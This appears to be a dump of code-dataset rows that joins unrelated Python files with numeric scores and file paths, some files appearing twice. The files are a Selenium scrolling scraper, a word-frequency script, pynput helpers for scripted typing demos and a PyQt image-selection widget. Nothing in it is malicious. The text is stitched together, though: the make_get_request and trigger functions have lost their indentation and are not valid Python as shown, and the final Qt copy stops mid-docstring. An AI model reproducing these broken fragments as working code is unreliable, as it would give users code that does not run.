    :param html_content: HTML of the loaded page
    :return: dictionary {'url': html_child_content, ...}
    """
    result = dict()
    soup = BeautifulSoup(html_content, 'html.parser')
    parent = soup.find(self.__parent_element, {'class': self.__parent_element_classes})
    # bs4 returns None when nothing matches; previously this crashed with
    # an AttributeError on pages without the container.
    if parent is None:
        return result
    childs = parent.find_all(self.__child_element, {'class': self.__child_element_classes})
    # url extraction
    for child in childs:
        url = child.find('a', {'class': self.__url_classes})
        # Skip children without a matching anchor or without an href,
        # instead of raising on url['href'].
        if url is None or not url.has_attr('href'):
            continue
        result[url['href']] = child
    return result
def make_get_request(self):
"""
:return: dictionary {'url': html_child_content,...}
"""
self.__browser.get(self.__url)
html_content = self.__browser.page_source
elements = self.__get_elements(html_content)
SCROLL_PAUSE_TIME = 1
last_height = self.__browser.execute_script("return document.body.scrollHeight")
new_height = 0
while new_height != last_height:
last_height = new_height
# Scroll down to bottom
self.__browser.execute_script("window.scrollTo(0, document.body.scrollHeight);")
# Wait to load page
time.sleep(SCROLL_PAUSE_TIME)
# upload data
html_content = self.__browser.page_source
elements.update(
self.__get_elements(html_content)
)
# Calculate new scroll height and compare with last scroll height
new_height = self.__browser.execute_script("return document.body.scrollHeight")
# TODO delete all prints
print('Scrolling...')
return elements | 0.214445 | 0.086671 |
import operator
import re
import sys
import time
def get_word_counts(words, ignored_words):
    """Count occurrences of each normalized word in *words*.

    Words are stripped of surrounding punctuation and lower-cased;
    words contained in *ignored_words* are excluded.

    :param words: the text to count words in
    :param ignored_words: iterable of normalized words to skip
    :return: an iterable of (word, count) pairs
    """
    # A set gives O(1) membership tests for the ignored words.
    ignored = set(ignored_words)
    word_counts = {}
    for raw_word in words.split():
        # Trim leading/trailing punctuation, then normalize case.
        word = raw_word.lstrip('([!,.?:;-)]').rstrip('([!,.?:;-)]').lower()
        if not word or word in ignored:
            continue
        word_counts[word] = word_counts.get(word, 0) + 1
    return word_counts.items()
def get_n_most_frequent(word_counts, n):
    """Return the *n* (word, count) pairs with the highest counts."""
    ranked = sorted(word_counts, key=lambda pair: pair[1], reverse=True)
    return ranked[:n]
def start():
    """CLI entry point: report the N most frequent words of a document.

    Usage: word_frequency.py [N [input_file [ignored_words_file]]]
    Prints the top-N words and the time taken by each phase.
    """
    number_of_most_frequent_words = 1
    document_text = ''
    ignored_words = []
    # argv[1]: how many of the most frequent words to report
    if len(sys.argv) >= 2:
        number_of_most_frequent_words = int(sys.argv[1])
    # argv[2]: the document to analyze
    if len(sys.argv) >= 3:
        input_file_name = sys.argv[2]
        try:
            with open(input_file_name) as file_object:
                raw_document_text = file_object.read()
                # Collapse any run of chars outside printable ASCII '!'..'~'
                # (whitespace, control chars) into a single space.
                document_text = re.sub('[^!-~]+', ' ', raw_document_text).strip()
        except FileNotFoundError:
            print('The specified input file %s does not exist' % (input_file_name))
            return
    # argv[3]: optional newline-separated list of words to ignore
    if len(sys.argv) >= 4:
        ignored_words_file_name = sys.argv[3]
        try:
            with open(ignored_words_file_name) as file_object:
                raw_document_text = file_object.read()
                ignored_words = raw_document_text.split('\n')
        except FileNotFoundError:
            print('The specified ignored words file %s does not exist' % (ignored_words_file_name))
            return
    startTime = time.time()
    word_counts = get_word_counts(document_text, ignored_words)
    print("Counting words took %f seconds" % (time.time() - startTime))
    startTime = time.time()
    most_frequent_words = get_n_most_frequent(word_counts, number_of_most_frequent_words)
    print("Getting top %d words took %f seconds" % (number_of_most_frequent_words, time.time() - startTime))
    # print(word_counts)
    print(most_frequent_words)
# example to run, "python3 word_frequency.py 10 usa-constitution.txt unimportant_words.txt
start() | word_frequency/word_frequency.py | import operator
import re
import sys
import time
def get_word_counts(words, ignored_words):
    """Count occurrences of each normalized word in *words*.

    Words are stripped of surrounding punctuation and lower-cased;
    words contained in *ignored_words* are excluded.

    :param words: the text to count words in
    :param ignored_words: iterable of normalized words to skip
    :return: an iterable of (word, count) pairs
    """
    # A set gives O(1) membership tests for the ignored words.
    ignored = set(ignored_words)
    word_counts = {}
    for raw_word in words.split():
        # Trim leading/trailing punctuation, then normalize case.
        word = raw_word.lstrip('([!,.?:;-)]').rstrip('([!,.?:;-)]').lower()
        if not word or word in ignored:
            continue
        word_counts[word] = word_counts.get(word, 0) + 1
    return word_counts.items()
def get_n_most_frequent(word_counts, n):
    """Return the *n* (word, count) pairs with the highest counts."""
    ranked = sorted(word_counts, key=lambda pair: pair[1], reverse=True)
    return ranked[:n]
def start():
    """CLI entry point: report the N most frequent words of a document.

    Usage: word_frequency.py [N [input_file [ignored_words_file]]]
    Prints the top-N words and the time taken by each phase.
    """
    number_of_most_frequent_words = 1
    document_text = ''
    ignored_words = []
    # argv[1]: how many of the most frequent words to report
    if len(sys.argv) >= 2:
        number_of_most_frequent_words = int(sys.argv[1])
    # argv[2]: the document to analyze
    if len(sys.argv) >= 3:
        input_file_name = sys.argv[2]
        try:
            with open(input_file_name) as file_object:
                raw_document_text = file_object.read()
                # Collapse any run of chars outside printable ASCII '!'..'~'
                # (whitespace, control chars) into a single space.
                document_text = re.sub('[^!-~]+', ' ', raw_document_text).strip()
        except FileNotFoundError:
            print('The specified input file %s does not exist' % (input_file_name))
            return
    # argv[3]: optional newline-separated list of words to ignore
    if len(sys.argv) >= 4:
        ignored_words_file_name = sys.argv[3]
        try:
            with open(ignored_words_file_name) as file_object:
                raw_document_text = file_object.read()
                ignored_words = raw_document_text.split('\n')
        except FileNotFoundError:
            print('The specified ignored words file %s does not exist' % (ignored_words_file_name))
            return
    startTime = time.time()
    word_counts = get_word_counts(document_text, ignored_words)
    print("Counting words took %f seconds" % (time.time() - startTime))
    startTime = time.time()
    most_frequent_words = get_n_most_frequent(word_counts, number_of_most_frequent_words)
    print("Getting top %d words took %f seconds" % (number_of_most_frequent_words, time.time() - startTime))
    # print(word_counts)
    print(most_frequent_words)
# example to run, "python3 word_frequency.py 10 usa-constitution.txt unimportant_words.txt
start() | 0.192009 | 0.116814 |
import time
import random
import click
from pynput.keyboard import Key, Listener
from click import echo
class Trigger:
    """Tracks key presses against a target key sequence.

    `check` is intended as a pynput `on_press` callback: it returns
    `False` (stopping the listener) once the whole sequence has been
    entered, or after more than 10 keys have been pressed in total.
    """

    def __init__(self, key_list, verbose=False) -> None:
        self.index = 0          # how much of the sequence matched so far
        self.keys = key_list    # the target key sequence
        self.list = []          # every key seen since monitoring began
        self.verbose = verbose

    def return_key(self, key):
        """Return the printable char of *key*, or *key* itself for special keys."""
        return getattr(key, 'char', key)

    def check(self, key):
        """Consume one key press; return False when monitoring should stop."""
        self.list.append(key)
        if self.return_key(key) == self.keys[self.index]:
            self.index += 1
        else:
            # Wrong key: the sequence must be restarted from scratch.
            self.index = 0
        done = self.index == len(self.keys)
        if len(self.list) > 10:
            return False
        if self.verbose:
            echo(f'Keys pressed since started monitoring, {len(self.list)}.')
            echo(f'Pressed "{self.return_key(key)}", index is {self.index}')
        return not done
# Typing: We need a function that simulates typing a string.
def type_str(line: str, keyboard, wpm: int=35, enter: bool=True, init: int=1) -> None:
    """Simulate a human typing *line* on *keyboard*.

    :param line: text to type, one character at a time
    :param keyboard: pynput keyboard controller
    :param wpm: rough typing speed; higher means shorter pauses
    :param enter: press Enter after the line when True
    :param init: seconds to wait before starting
    """
    time.sleep(init)
    for ch in line:
        keyboard.type(ch)
        # Randomized per-character delay, scaled by the typing speed.
        time.sleep(random.random()*10.0/wpm)
    if not enter:
        return
    keyboard.press(Key.enter)
    keyboard.release(Key.enter)
# Display: Print the entire line to the screen without delay.
def display(line: str, keyboard, prefix: str='#', enter: bool=True, init: int=1) -> None:
    """Show *line* at once (prefixed, e.g. as a shell comment) without typing delay.

    :param line: text to display
    :param keyboard: pynput keyboard controller
    :param prefix: string prepended before the line
    :param enter: press Enter afterwards when True
    :param init: seconds to wait before displaying
    """
    time.sleep(init)
    keyboard.type(f'{prefix} {line}')
    if not enter:
        return
    keyboard.press(Key.enter)
    keyboard.release(Key.enter)
# Pause: Pause for specified seconds
def pause(t: float=1):
    """Block for *t* seconds."""
    time.sleep(t)
# Pause until...
def wait(continue_key=Key.enter):
    """Block until *continue_key* is pressed, then clear the terminal."""
    prompt = click.style(f'Paused. Press "{continue_key}" to continue.', blink=True, bold=True)
    click.echo(prompt)
    # The listener callback returns False (stopping the listener) as soon
    # as the continue key is seen.
    with Listener(on_press=lambda key: key != continue_key) as listener:
        listener.join()
    click.echo(click.style('Unpaused.', bold=True))
    click.clear()
# Clear: Clear the screen
def clear(keyboard):
    """Clear the terminal by sending the Ctrl+L chord on *keyboard*."""
    keyboard.press(Key.ctrl_l)
    for action in (keyboard.press, keyboard.release):
        action('l')
    keyboard.release(Key.ctrl_l)
# Function to listen for a string of letters.
def trigger(word:str, continue_key=Key.enter) -> bool:
# Key sequence to listen for...
keys = []
for letter in word:
keys.append(letter)
keys.append(continue_key)
trigger_obj = Trigger(keys)
with Listener(on_press=trigger_obj.check) as listener:
listener.join()
return True | scripted_demos/utilities.py | import time
import random
import click
from pynput.keyboard import Key, Listener
from click import echo
class Trigger:
    """Tracks key presses against a target key sequence.

    `check` is intended as a pynput `on_press` callback: it returns
    `False` (stopping the listener) once the whole sequence has been
    entered, or after more than 10 keys have been pressed in total.
    """

    def __init__(self, key_list, verbose=False) -> None:
        self.index = 0          # how much of the sequence matched so far
        self.keys = key_list    # the target key sequence
        self.list = []          # every key seen since monitoring began
        self.verbose = verbose

    def return_key(self, key):
        """Return the printable char of *key*, or *key* itself for special keys."""
        return getattr(key, 'char', key)

    def check(self, key):
        """Consume one key press; return False when monitoring should stop."""
        self.list.append(key)
        if self.return_key(key) == self.keys[self.index]:
            self.index += 1
        else:
            # Wrong key: the sequence must be restarted from scratch.
            self.index = 0
        done = self.index == len(self.keys)
        if len(self.list) > 10:
            return False
        if self.verbose:
            echo(f'Keys pressed since started monitoring, {len(self.list)}.')
            echo(f'Pressed "{self.return_key(key)}", index is {self.index}')
        return not done
# Typing: We need a function that simulates typing a string.
def type_str(line: str, keyboard, wpm: int=35, enter: bool=True, init: int=1) -> None:
    """Simulate a human typing *line* on *keyboard*.

    :param line: text to type, one character at a time
    :param keyboard: pynput keyboard controller
    :param wpm: rough typing speed; higher means shorter pauses
    :param enter: press Enter after the line when True
    :param init: seconds to wait before starting
    """
    time.sleep(init)
    for ch in line:
        keyboard.type(ch)
        # Randomized per-character delay, scaled by the typing speed.
        time.sleep(random.random()*10.0/wpm)
    if not enter:
        return
    keyboard.press(Key.enter)
    keyboard.release(Key.enter)
# Display: Print the entire line to the screen without delay.
def display(line: str, keyboard, prefix: str='#', enter: bool=True, init: int=1) -> None:
    """Show *line* at once (prefixed, e.g. as a shell comment) without typing delay.

    :param line: text to display
    :param keyboard: pynput keyboard controller
    :param prefix: string prepended before the line
    :param enter: press Enter afterwards when True
    :param init: seconds to wait before displaying
    """
    time.sleep(init)
    keyboard.type(f'{prefix} {line}')
    if not enter:
        return
    keyboard.press(Key.enter)
    keyboard.release(Key.enter)
# Pause: Pause for specified seconds
def pause(t: float=1):
    """Block for *t* seconds."""
    time.sleep(t)
# Pause until...
def wait(continue_key=Key.enter):
    """Block until *continue_key* is pressed, then clear the terminal."""
    prompt = click.style(f'Paused. Press "{continue_key}" to continue.', blink=True, bold=True)
    click.echo(prompt)
    # The listener callback returns False (stopping the listener) as soon
    # as the continue key is seen.
    with Listener(on_press=lambda key: key != continue_key) as listener:
        listener.join()
    click.echo(click.style('Unpaused.', bold=True))
    click.clear()
# Clear: Clear the screen
def clear(keyboard):
    """Clear the terminal by sending the Ctrl+L chord on *keyboard*."""
    keyboard.press(Key.ctrl_l)
    for action in (keyboard.press, keyboard.release):
        action('l')
    keyboard.release(Key.ctrl_l)
# Function to listen for a string of letters.
def trigger(word:str, continue_key=Key.enter) -> bool:
# Key sequence to listen for...
keys = []
for letter in word:
keys.append(letter)
keys.append(continue_key)
trigger_obj = Trigger(keys)
with Listener(on_press=trigger_obj.check) as listener:
listener.join()
return True | 0.438304 | 0.112356 |
import logging
from typing import Optional, Tuple
from wiki_music.gui_lib.qt_importer import (
QBuffer, QByteArray, QEvent, QImage, QIODevice, QLabel, QPixmap, QPoint,
QRect, QRubberBand, QSize, QSizePolicy, QStyleFactory, Qt, Signal)
logging.getLogger(__name__)
__all__ = ["ResizablePixmap", "SelectablePixmap"]
class _ResizableRubberBand(QRubberBand):
    """Reimplements QRubberBand so its aspect ratio can be set.

    Attributes
    ----------
    aspect_ratio: Tuple[int, int]
        the aspect ratio that the rubberband is forced to obey
    """

    # NOTE(review): annotated as a 2-tuple (was `Optional[float]`) because
    # resizeEvent unpacks it with QSize(*self.aspect_ratio); a bare float
    # would fail there.
    aspect_ratio: Optional[Tuple[int, int]]

    def __init__(self, *args, **kwargs) -> None:
        super().__init__(*args, **kwargs)
        self.aspect_ratio = None

    def resizeEvent(self, event: QEvent):
        """Reimplements resizeEvent with forced aspect ratio.

        Parameters
        ----------
        event: QEvent
            the event that triggered this method (unused; may be None)
        """
        if self.aspect_ratio:
            # Scale a unit-size with the forced ratio to the closest size
            # fitting the current one, then resize to it.
            size = QSize(*self.aspect_ratio)
            size.scale(self.size(), Qt.KeepAspectRatio)
            self.resize(size)

    def set_aspect_ratio(self, ratio: float):
        """Sets forced aspect ratio for rubberband.

        Parameters
        ----------
        ratio: float
            aspect ratio value; NOTE(review): resizeEvent unpacks this
            with `*`, so a (width, height) 2-tuple appears to be expected
            — confirm against callers.
        """
        self.aspect_ratio = ratio
        # Re-apply the constraint immediately (the event arg is ignored).
        self.resizeEvent(None)
class ResizablePixmap(QLabel):
    """Picture that can be arbitrarilly resized while keeping its aspect ratio.

    Parameters
    ----------
    bytes_image: bytes
        image to display, in raw bytes form
    stretch: bool
        when True the label may grow and shrink freely in both directions;
        otherwise its horizontal size policy is fixed

    Attributes
    ----------
    bytes_image_edit: bytes
        raw bytes of the image currently displayed
    """
    bytes_image_edit: bytes

    def __init__(self, bytes_image: bytes, stretch: bool = True) -> None:
        QLabel.__init__(self)
        # `Ignored` lets the layout resize the label freely in that direction
        if stretch:
            self.setSizePolicy(QSizePolicy.Ignored, QSizePolicy.Ignored)
        else:
            self.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Ignored)
        self.setAlignment(Qt.AlignCenter)
        self.setStyleSheet("background-color: #ffffff;")
        # show the supplied image immediately
        self.update_pixmap(bytes_image)

    def update_pixmap(self, bytes_image: bytes):
        """Changes displayed image for a new one.

        Parameters
        ----------
        bytes_image: bytes
            new image to display in bytes format
        """
        self.bytes_image_edit = bytes_image
        self.current_pixmap = self._bytes2pixmap(bytes_image)
        #self.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
        self.scale()

    def scale(self, fromResize: bool = False):
        """Handle picture scaling.

        Parameters
        ----------
        fromResize: bool
            special handling if this method was called after resize, but only
            in subclasses
        """
        # use a single central method for scaling; there's no need to call it
        # upon creation and also resize() won't work anyway in a layout
        self.setPixmap(self.current_pixmap.scaled(self.width(), self.height(),
                                                  Qt.KeepAspectRatio,
                                                  Qt.SmoothTransformation))

    def resizeEvent(self, event: QEvent):
        """Reimplement behaviour on resize with scaling enabled.

        Parameters
        ----------
        event: QEvent
            the event that triggered this method
        """
        super(ResizablePixmap, self).resizeEvent(event)
        # re-fit the pixmap to the label's new size
        self.scale(fromResize=True)

    @staticmethod
    def _bytes2pixmap(raw_image: bytes) -> QPixmap:
        """Convert bytes image to `QPixmap`.

        Parameters
        ----------
        raw_image: bytes
            bytes image to be converted

        Returns
        -------
        QPixmap
            image as Qt QPixmap
        """
        image = QImage()
        image.loadFromData(raw_image)
        return QPixmap(image)

    @staticmethod
    def _pixmap2bytes(pixmap: QPixmap) -> bytes:
        """Convert `QPixmap` to bytes image.

        Parameters
        ----------
        pixmap: QPixmap
            Qt QPixmap to be converted

        Returns
        -------
        bytes
            PNG-encoded bytes image
        """
        byte_array = QByteArray()
        buffer = QBuffer(byte_array)
        buffer.open(QIODevice.WriteOnly)
        # serialize through an in-memory Qt buffer in PNG format
        pixmap.save(buffer, 'PNG')
        return byte_array.data()

    @property
    def image_dims(self) -> Tuple[int, int]:
        """Actual image dimensions.

        Returns
        -------
        Tuple[int, int]
            image width and height
        """
        # NOTE(review): these are the *label's* width/height, not the
        # underlying pixmap's -- confirm this is the intended meaning.
        return self.width(), self.height()
class SelectablePixmap(ResizablePixmap):
    """Pixmap whose part can be selected with a selection rubberband.

    Warnings
    --------
    The solution is copied from stackoverflow and is not yet
    properly documented.

    References
    ----------
    https://stackoverflow.com/questions/58053735/get-real-size-of-qpixmap-in-qlabel

    Attributes
    ----------
    currentQRubberBand: Optional[_ResizableRubberBand]
        holds reference to current rubberband
    rubberBandOffset: Optional[QPoint]
        rubberband upper left corner offset from the point where the mouse was
        clicked before dragging start
    moveDirection: Optional[Qt.Orientation]
        direction in which rubberband edge is dragged when resizing
    rubberBandRatio: Optional[float]
        forced aspect ratio of rubberband
    pixmapRect: QRect
        rectangle defining the pixmap borders
    selectionActive: Signal(bool)
        signal emitted whenever a new rubberband selection is created or
        destroyed
    """
    currentQRubberBand: Optional[_ResizableRubberBand]
    rubberBandOffset: Optional[QPoint]
    moveDirection: Optional[Qt.Orientation]
    rubberBandRatio: Optional[float]
    pixmapRect: QRect
    selectionActive: Signal = Signal(bool)

    def __init__(self, bytes_image: bytes) -> None:
        super().__init__(bytes_image)
        # activate mouse tracking to change cursor on rubberband hover
        self.setMouseTracking(True)
        self.currentQRubberBand = None
        self.rubberBandOffset = None
        # 0 means "no edge drag in progress" (despite the Optional annotation)
        self.moveDirection = 0
        self.rubberBandRatio = None

    def set_aspect_ratio(self, ratio: Optional[float]):
        """Sets aspect ratio for rubberband.

        Parameters
        ----------
        ratio: float
            desired aspect ratio; None removes the constraint
        """
        self.rubberBandRatio = ratio
        self._update_ratio()

    def _update_ratio(self):
        """If rubberband is created updates its aspect ratio."""
        if self.currentQRubberBand:
            self.currentQRubberBand.set_aspect_ratio(self.rubberBandRatio)

    def create_selection(self, pos: QPoint):
        """Create new rubberband selection.

        Parameters
        ----------
        pos: QPoint
            clicked position

        Note
        ----
        If an old selection existed, a new one is created only if the mouse
        click happens outside of that selection. Otherwise the current
        selection is moved.
        """
        if self.currentQRubberBand:
            self.cancel_selection()
        self.currentQRubberBand = _ResizableRubberBand(QRubberBand.Rectangle,
                                                       self)
        self.currentQRubberBand.setStyle(QStyleFactory.create("Fusion"))
        # start as a 1x1 rect at the click point; dragging grows it
        self.currentQRubberBand.setGeometry(pos.x(), pos.y(), 1, 1)
        self.currentQRubberBand.show()
        self.originQPoint = pos
        # route the band's Resize/Move events through self.eventFilter
        self.currentQRubberBand.installEventFilter(self)

    def cancel_selection(self):
        """Cancels the current selection and destroys the rubberband."""
        self.currentQRubberBand.hide()
        self.currentQRubberBand.deleteLater()
        self.currentQRubberBand = None
        self.originQPoint = None
        self.selectionActive.emit(False)

    def scale(self, fromResize: bool = False):
        """Handle picture and selection scaling caused by window resize.

        Parameters
        ----------
        fromResize: bool
            tells the type of event that requested scaling
        """
        if fromResize and self.currentQRubberBand:
            # keep data for rubber resizing, before scaling
            oldPixmapRect = self.pixmap().rect()
            oldOrigin = (self.currentQRubberBand.pos() -
                         self.pixmapRect.topLeft())
        super(SelectablePixmap, self).scale()
        # assuming that you always align the image in the center,
        # get the current pixmap rect and move
        # the rectangle center to the current geometry
        self.pixmapRect = self.pixmap().rect()
        self.pixmapRect.moveCenter(self.rect().center())
        if fromResize and self.currentQRubberBand:
            # find the new size ratio based on the previous
            xRatio = self.pixmapRect.width() / oldPixmapRect.width()
            yRatio = self.pixmapRect.height() / oldPixmapRect.height()
            # create a new geometry using 0-rounding for improved accuracy
            # NOTE(review): round(x, 0) yields a float in Python 3 while
            # setGeometry takes ints; also the first argument adds the x
            # offset *after* rounding whereas the second rounds the sum --
            # confirm this works with the Qt binding in use.
            self.currentQRubberBand.setGeometry(
                round(oldOrigin.x() * xRatio, 0) + self.pixmapRect.x(),
                round(oldOrigin.y() * yRatio + self.pixmapRect.y(), 0),
                round(self.currentQRubberBand.width() * xRatio, 0),
                round(self.currentQRubberBand.height() * yRatio, 0))

    def updateMargins(self):
        """Update picture margins for mouse event tracking.

        Whenever the rubberband rectangle geometry changes, create virtual
        rectangles for corners and sides to ease up mouse event checking.
        """
        rect = self.currentQRubberBand.geometry()
        # 8x8 px grab handles at the four corners (normalized so each
        # rect has positive width/height)
        self.rubberTopLeft = QRect(rect.topLeft(),
                                   QSize(8, 8))
        self.rubberTopRight = QRect(rect.topRight(),
                                    QSize(-8, 8)).normalized()
        self.rubberBottomRight = QRect(rect.bottomRight(),
                                       QSize(-8, -8)).normalized()
        self.rubberBottomLeft = QRect(rect.bottomLeft(),
                                      QSize(8, -8)).normalized()
        # edge strips between the corner handles
        self.rubberLeft = QRect(self.rubberTopLeft.bottomLeft(),
                                self.rubberBottomLeft.topRight())
        self.rubberTop = QRect(self.rubberTopLeft.topRight(),
                               self.rubberTopRight.bottomLeft())
        self.rubberRight = QRect(self.rubberTopRight.bottomLeft(),
                                 self.rubberBottomRight.topRight())
        self.rubberBottom = QRect(self.rubberBottomLeft.topRight(),
                                  self.rubberBottomRight.bottomLeft())
        # interior region used for move (drag) detection
        self.rubberInnerRect = QRect(self.rubberTop.bottomLeft(),
                                     self.rubberBottom.topRight())

    def eventFilter(self, source, event: QEvent):
        """Filters GUI events to call special method on resize event.

        Parameters
        ----------
        source
            source that caused the event
        event: QEvent
            type of event

        Returns
        -------
        Callable
            result of the superclass eventFilter
        """
        if event.type() in (QEvent.Resize, QEvent.Move):
            self.updateMargins()
        return super(SelectablePixmap, self).eventFilter(source, event)

    def mousePressEvent(self, event: QEvent):
        """Handles left mouse button clicks.

        If the clicked position is inside the current selection then that
        selection is moved. If it is outside then a new selection is created.
        If the click is in selection margins then the selection is resized by
        dragging one of the edges.

        Parameters
        ----------
        event: QEvent
            calling event

        See also
        --------
        :meth:`SelectablePixmap.updateMargins`
            method responsible for creating margins and keeping them up to date
        """
        pos = event.pos()
        if (not self.currentQRubberBand or
            pos not in self.currentQRubberBand.geometry()):  # noqa E129
            # click outside any selection: start a fresh one (only inside
            # the pixmap area)
            if pos not in self.pixmapRect:
                self.originQPoint = None
                return
            self.create_selection(pos)
            self.selectionActive.emit(True)
            self._update_ratio()
        # corner handles: resize with the opposite corner as fixed origin
        elif pos in self.rubberTopLeft:
            self.originQPoint = (
                self.currentQRubberBand.geometry().bottomRight())
        elif pos in self.rubberTopRight:
            self.originQPoint = self.currentQRubberBand.geometry().bottomLeft()
        elif pos in self.rubberBottomRight:
            self.originQPoint = self.currentQRubberBand.geometry().topLeft()
        elif pos in self.rubberBottomLeft:
            self.originQPoint = self.currentQRubberBand.geometry().topRight()
        # edge strips: resize constrained to one axis
        elif pos in self.rubberTop:
            self.originQPoint = self.currentQRubberBand.geometry().bottomLeft()
            self.moveDirection = Qt.Vertical
        elif pos in self.rubberBottom:
            self.originQPoint = self.currentQRubberBand.geometry().topLeft()
            self.moveDirection = Qt.Vertical
        elif pos in self.rubberLeft:
            self.originQPoint = self.currentQRubberBand.geometry().topRight()
            self.moveDirection = Qt.Horizontal
        elif pos in self.rubberRight:
            self.originQPoint = self.currentQRubberBand.geometry().topLeft()
            self.moveDirection = Qt.Horizontal
        else:
            # click inside the selection: remember offset for dragging
            self.rubberBandOffset = pos - self.currentQRubberBand.pos()

    def mouseMoveEvent(self, event: QEvent):
        """Handles mouse movement events concerning the rubberband.

        The movement after a mouse button is clicked and held can cause
        two actions. If the click occurred in the margins then the selection
        is resized by dragging the edge. If it is inside the selection
        rectangle then the selection rubberband is moved by dragging.

        Parameters
        ----------
        event: QEvent
            the calling event
        """
        pos = event.pos()
        if event.buttons() == Qt.NoButton and self.currentQRubberBand:
            # hover only: pick a cursor shape matching the region under it
            if pos in self.rubberTopLeft or pos in self.rubberBottomRight:
                self.setCursor(Qt.SizeFDiagCursor)
            elif pos in self.rubberTopRight or pos in self.rubberBottomLeft:
                self.setCursor(Qt.SizeBDiagCursor)
            elif pos in self.rubberLeft or pos in self.rubberRight:
                self.setCursor(Qt.SizeHorCursor)
            elif pos in self.rubberTop or pos in self.rubberBottom:
                self.setCursor(Qt.SizeVerCursor)
            elif pos in self.rubberInnerRect:
                self.setCursor(Qt.SizeAllCursor)
            else:
                self.unsetCursor()
        elif event.buttons():
            if self.rubberBandOffset and self.currentQRubberBand:
                # drag-move: keep the selection fully inside the image
                target = pos - self.rubberBandOffset
                rect = QRect(target, self.currentQRubberBand.size())
                # limit positioning of the selection to the image rectangle
                if rect.x() < self.pixmapRect.x():
                    rect.moveLeft(self.pixmapRect.x())
                elif rect.right() > self.pixmapRect.right():
                    rect.moveRight(self.pixmapRect.right())
                if rect.y() < self.pixmapRect.y():
                    rect.moveTop(self.pixmapRect.y())
                elif rect.bottom() > self.pixmapRect.bottom():
                    rect.moveBottom(self.pixmapRect.bottom())
                self.currentQRubberBand.setGeometry(rect)
            elif self.originQPoint and self.currentQRubberBand:
                if self.moveDirection == Qt.Vertical:
                    # keep the X fixed to the current right, so that only the
                    # vertical position is changed
                    pos.setX(self.currentQRubberBand.geometry().right())
                else:
                    # limit the X to the pixmapRect extent
                    if pos.x() < self.pixmapRect.x():
                        pos.setX(self.pixmapRect.x())
                    elif pos.x() > self.pixmapRect.right():
                        pos.setX(self.pixmapRect.right())
                if self.moveDirection == Qt.Horizontal:
                    # same as before, but for the Y position
                    pos.setY(self.currentQRubberBand.geometry().bottom())
                else:
                    # limit the Y to the pixmapRect extent
                    if pos.y() < self.pixmapRect.y():
                        pos.setY(self.pixmapRect.y())
                    elif pos.y() > self.pixmapRect.bottom():
                        pos.setY(self.pixmapRect.bottom())
                rect = QRect(self.originQPoint, pos)
                self.currentQRubberBand.setGeometry(rect.normalized())

    def mouseReleaseEvent(self, event: QEvent):
        """Handles mouse release events and cleans up the data afterwards.

        Resets: rubberBandOffset, originQPoint, moveDirection
        """
        self.rubberBandOffset = None
        self.originQPoint = None
        self.moveDirection = 0 | wiki_music/gui_lib/custom_classes/pictures.py |
import logging
from typing import Optional, Tuple
from wiki_music.gui_lib.qt_importer import (
QBuffer, QByteArray, QEvent, QImage, QIODevice, QLabel, QPixmap, QPoint,
QRect, QRubberBand, QSize, QSizePolicy, QStyleFactory, Qt, Signal)
logging.getLogger(__name__)
__all__ = ["ResizablePixmap", "SelectablePixmap"]
class _ResizableRubberBand(QRubberBand):
    """Rubberband whose aspect ratio can be forced to a fixed value.

    Attributes
    ----------
    aspect_ratio: Optional[float]
        the aspect ratio the rubberband is forced to obey; ``None``
        disables the constraint.
        NOTE(review): ``resizeEvent`` unpacks this with ``QSize(*...)``,
        which requires a 2-item sequence, while the annotation and
        ``set_aspect_ratio`` suggest a single float -- confirm what
        callers actually store here.
    """
    aspect_ratio: Optional[float]

    def __init__(self, *args, **kwargs) -> None:
        super().__init__(*args, **kwargs)
        self.aspect_ratio = None

    def resizeEvent(self, event: QEvent):
        """Resize the band, re-applying the forced aspect ratio if set.

        Parameters
        ----------
        event: QEvent
            the event that triggered this method (may be None when
            invoked manually from ``set_aspect_ratio``)
        """
        if not self.aspect_ratio:
            return
        constrained = QSize(*self.aspect_ratio)
        constrained.scale(self.size(), Qt.KeepAspectRatio)
        self.resize(constrained)

    def set_aspect_ratio(self, ratio: float):
        """Store *ratio* and immediately re-apply it to the current size.

        Parameters
        ----------
        ratio: float
            aspect ratio value to enforce
        """
        self.aspect_ratio = ratio
        self.resizeEvent(None)
class ResizablePixmap(QLabel):
    """Picture that can be arbitrarilly resized while keeping its aspect ratio.

    Parameters
    ----------
    bytes_image: bytes
        image to display, in raw bytes form
    stretch: bool
        when True the label may grow and shrink freely in both directions;
        otherwise its horizontal size policy is fixed

    Attributes
    ----------
    bytes_image_edit: bytes
        raw bytes of the image currently displayed
    """
    bytes_image_edit: bytes

    def __init__(self, bytes_image: bytes, stretch: bool = True) -> None:
        QLabel.__init__(self)
        # `Ignored` lets the layout resize the label freely in that direction
        if stretch:
            self.setSizePolicy(QSizePolicy.Ignored, QSizePolicy.Ignored)
        else:
            self.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Ignored)
        self.setAlignment(Qt.AlignCenter)
        self.setStyleSheet("background-color: #ffffff;")
        # show the supplied image immediately
        self.update_pixmap(bytes_image)

    def update_pixmap(self, bytes_image: bytes):
        """Changes displayed image for a new one.

        Parameters
        ----------
        bytes_image: bytes
            new image to display in bytes format
        """
        self.bytes_image_edit = bytes_image
        self.current_pixmap = self._bytes2pixmap(bytes_image)
        #self.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
        self.scale()

    def scale(self, fromResize: bool = False):
        """Handle picture scaling.

        Parameters
        ----------
        fromResize: bool
            special handling if this method was called after resize, but only
            in subclasses
        """
        # use a single central method for scaling; there's no need to call it
        # upon creation and also resize() won't work anyway in a layout
        self.setPixmap(self.current_pixmap.scaled(self.width(), self.height(),
                                                  Qt.KeepAspectRatio,
                                                  Qt.SmoothTransformation))

    def resizeEvent(self, event: QEvent):
        """Reimplement behaviour on resize with scaling enabled.

        Parameters
        ----------
        event: QEvent
            the event that triggered this method
        """
        super(ResizablePixmap, self).resizeEvent(event)
        # re-fit the pixmap to the label's new size
        self.scale(fromResize=True)

    @staticmethod
    def _bytes2pixmap(raw_image: bytes) -> QPixmap:
        """Convert bytes image to `QPixmap`.

        Parameters
        ----------
        raw_image: bytes
            bytes image to be converted

        Returns
        -------
        QPixmap
            image as Qt QPixmap
        """
        image = QImage()
        image.loadFromData(raw_image)
        return QPixmap(image)

    @staticmethod
    def _pixmap2bytes(pixmap: QPixmap) -> bytes:
        """Convert `QPixmap` to bytes image.

        Parameters
        ----------
        pixmap: QPixmap
